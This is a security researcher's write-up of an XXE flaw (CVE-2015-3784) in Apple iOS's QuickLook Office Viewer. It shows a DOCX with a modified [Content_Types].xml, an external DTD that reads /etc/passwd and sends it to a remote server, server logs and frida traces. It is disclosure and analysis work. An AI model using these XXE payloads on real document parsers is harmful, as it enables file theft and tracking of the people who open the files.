XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)

This article summarises the discovery and analysis of the XXE vulnerability in Apple iOS Office Viewer (CVE-2015-3784). It assumes the reader already has a basic understanding of XXE attacks. Also, tests are performed on a jailbroken iOS device for analysis purposes, although later confirmed on a stock ("jailed") iOS. For this article we also used safari as an example, but any iOS application that uses the internal Office Viewer (from the QuickLook Framework) should have similar behavior.


XML eXternal Entities vulnerabilities are a dime a dozen. Our experience tells us that they're quite prevalent in applications, specially when handling files whose format is XML. Such is the case of Microsoft Office OOXML files, among other similar file formats such as older Apple Keynote .key files or OpenOffice documents, which are basically ZIP archives of multiple XML files. This article will focus specifically on the DOCX file format, but PPTX/XLSX are basically the same, and on other formats the technique is similar.

Unzipping a DOCX file will create the following structure, that we will change to include our XXE attack:

$ unzip xxe.docx
Archive:  xxe.docx
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: word/_rels/document.xml.rels
inflating: word/document.xml
inflating: word/theme/theme1.xml
extracting: docProps/thumbnail.jpeg
inflating: word/settings.xml
inflating: word/webSettings.xml
inflating: word/stylesWithEffects.xml
inflating: docProps/core.xml
inflating: word/styles.xml
inflating: word/fontTable.xml
inflating: docProps/app.xml

Looking at the file structure, you'll see that there are a lot of XML files to play with. One good bet is [Content_Types].xml, which will work well for the XXE, by including the following after the first line:

<!DOCTYPE go [
<!ENTITY % go2 SYSTEM "">

You just need to update the DOCX file, and it's done:

$ zip -u xxe.docx \[Content_Types\].xml
updating: [Content_Types].xml (deflated 71%)

If the document parsing application/library is vulnerable to XXE, it will connect via HTTP to the webserver running on port 8000, and request the file "XXE".

Testing this on a vulnerable iOS by using safari to load the xxe.docx file, we get the confirmation that it works: - - [14/Aug/2015 17:58:35] "GET /xxe.docx HTTP/1.1" 200 - - - [14/Aug/2015 17:58:35] "GET /XXE HTTP/1.0" 200 -

On the first line we see safari accessing the xxe.docx, then it parses it and executes our XXE request.

This is fun, but can we do anything else ?

Actually, by manipulating entities and parameters, it is possible in some cases to remotely read files out of band. You can read the details here: https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf

So, since the SYSTEM functionality in XML is actually there to load other DTDs, which can define new entities and formats, we update our [Content_types].xml file, and create a specific external DTD file that will allow us to read a file, and get its contents back to us:


<!DOCTYPE go [
<!ENTITY % go2 SYSTEM "">

The above will load a DTD from our controlled server, and then execute the %all and %send entities, which will be defined in the send.dtd file:

<!ENTITY % file SYSTEM "file://etc/passwd">
<!ENTITY % all "<!ENTITY &#37; send SYSTEM ';'>">

The above file will attempt to read /etc/passwd, and its contents will be in the "file" entity. Then we create a new entity (you should read the above mentioned PDF, if you haven't yet), that will perform a request to our webserver with the contents as a parameter to the request.

Again, trying this on a vulnerable iOS....it partially fails: - - [14/Aug/2015 17:58:07] "GET /xxe.docx HTTP/1.1" 200 - - - [14/Aug/2015 17:58:08] "GET /send.dtd HTTP/1.0" 200 -

So, safari did read the docx, and did read the send.dtd file, but no contents. This can be for a number of reasons such as permissions or sandboxing, for instance.

One interesting funcionallity of some XML parsers is to read filesystem directories. Now it's time to read www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

So we change the "file" entity to "file:///" which in same cases, depending on the library used, can actually list the root directory. We seem to be closer to success: - - [14/Aug/2015 17:54:36] "GET /xxe.docx HTTP/1.1" 200 - - - [14/Aug/2015 17:54:36] "GET /evil.dtd HTTP/1.0" 200 - - - [14/Aug/2015 17:54:36] "GET /? HTTP/1.0" 301 -

So, the final "send" entity works, but no contents are sent.

This now is getting frustrating. Interestingly, looking at the syslog file on the iOS we see that an error happens when we try to read existent files:

Aug 14 18:57:47 iPhone MobileSafari[544]: EXCEPTION SFUDataRepresentationError: xmlParseChunk() failed: 1

Challenge accepted!

At this point, thinking on how to actually debug safari to find out where things are failing, Marco Vaz suggested using frida. I had never actually used frida, just read about it in the awesome Mobile Application Hacker's Handbook, and was unaware on how it could be used for this purpose. So we started by tracing all xmlParse* calls using frida:

$ frida-trace -U safari -i xmlParse*
Instrumenting functions...
xmlParseChunk: Auto-generated handler at "__handlers__/libxml2.2.dylib/xmlParseChunk.js"
xmlParseURI: Auto-generated handler at "__handlers__/libxml2.2.dylib/xmlParseURI.js"
Started tracing 89 functions. Press Ctrl+C to stop.

When reading again the xxe.docx file, we get the following output:

           /* TID 0xaa2f */
 53809 ms  xmlParserInputBufferPush()
 53812 ms  xmlParseChunk()
 53813 ms     | xmlParseXMLDecl()
 53814 ms     |    | xmlParseVersionInfo()
 53814 ms     |    |    | xmlParseVersionNum()
 53822 ms     |    | xmlParseEncodingDecl()
 53823 ms     |    |    | xmlParseEncName()
 53824 ms     |    | xmlParseSDDecl()
 53826 ms     | xmlParseURI()
 53827 ms     | xmlParserInputGrow()
 53829 ms  xmlParserInputBufferPush()

From the output, we see an interesting function, xmlParseURI(), which makes sense since what we are trying to do is actually read a file defined by an URI. We also get the interesting information that it is using libxml2 to handle XML. More on this later.

Frida allows us to manipulate the functions before and after they're called. One very simple change that actually helps a lot to understand what's going on, is to print the arguments to the function. So we edit __handlers__/libxml2.2.dylib/xmlParseURI.js, and change the logging to print the argument:

  onEnter(log, args, state) {
        log("xmlParseURI(" + Memory.readUtf8String(args[0]) + ")");

Now, attempting to read the /etc/passwd file, we see the following output:

$ frida-trace  -U safari -i xmlParseChunk -i xmlParseURI
Instrumenting functions...                                              
xmlParseChunk: Loaded handler at "__handlers__/libxml2.2.dylib/xmlParseChunk.js"
Started tracing 2 functions. Press Ctrl+C to stop.                   

 24347 ms     | xmlParseURI(file://etc/passwd)
 24348 ms     | xmlParseURI(file://etc/passwd)
 24349 ms     | xmlParseURI(file://etc/passwd)
 24351 ms     | xmlParseURI(
# 4.3BSD-compatable User Database
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
 24352 ms     | xmlParseURI(http://schemas.openxmlformats.org/package/2006/metadata/core-properties)
 24353 ms     | xmlParseURI(http://purl.org/dc/elements/1.1/)
 24353 ms     | xmlParseURI(http://purl.org/dc/terms/)
 24354 ms     | xmlParseURI(http://purl.org/dc/dcmitype/)

This is interesting. It seems that it is actually reading the file, but fails to send it to us as an URL parameter.
If you read the vsecurity PDF mentioned above, and paid more attention than I did, you'll see that libxml2 is quite picky about URL characters. Specifically on page 25, they state that "The libxml2 nano clients are so restrictive on URL content that they can prevent valid URLs from being requested, let alone those with questionable content. For this reason, out-of-band attacks using parameter entities will typically fail."
One of those characters, is the newline (0x0a) character... Worse, after some testing, we've seen that at least the characters # % < > " and \ are also not accepted, which actually makes exploiting in a useful way this quite a challenge, if at all possible.

So, trying to find a relevant file that actually matches all those restrictions is no easy task.

Additionally, even if one could find a relevant file that met those restrictions, on a stock iOS the process will be sandboxed, and limited to what files it is allowed to read, further reducing the possible files that could be compromised.

So what about OSX ?

OSX has the same problem, that's why Apple included this fix also on quicklook (QL Office they call it) on 10.10.5. The issue with OSX is that quicklook is, apparently, correctly sandboxed, and any network connection will fail:

Aug 16 13:15:03 xxx.local sandboxd[284] ([53893]): QuickLookSatelli(53893) deny network-outbound

As far as I can tell, this was not exploitable in OSX.


One interesting fact, is that Apple had actually fixed a similar issue in iOS 8 and OSX 10.10 (CVE-2014-4374), on the NSXMLParser in the Foundation Framework, as detailed in vsecurity's advisory at http://www.vsecurity.com/download/advisories/20140917-1.txt, but failed to fixe this for libxml2 or applications using it. Also interesting is that they took 4 months to fix that one, as they this this time, so they're consistent about fixing timelines of XXE vulnerabilities :).

Although it was quite interesting to find out that an XXE was possible in iOS (and OSX) on Apple's own applications, it seems that they ended up having some luck. The fact that libxml2 is quite restricted regarding URL contents really made this bug pretty much a proof-of-concept and not much more, although the privacy issue of leaking the victim's IP address may be relevant in some scenarios (e.g. send a file to a victim, wait for him to open it, find IP address, profit!). Also, sandboxing actually helped to also reduce the impact of this bug in both platforms.

Also, this vulnerability gave me the opportunity to use frida, which is a very interesting tool, although I didn't find it very stable, and the frida-server crashed quite often. Nonetheless, it's a very powerful tool.

Written by Bruno Morisson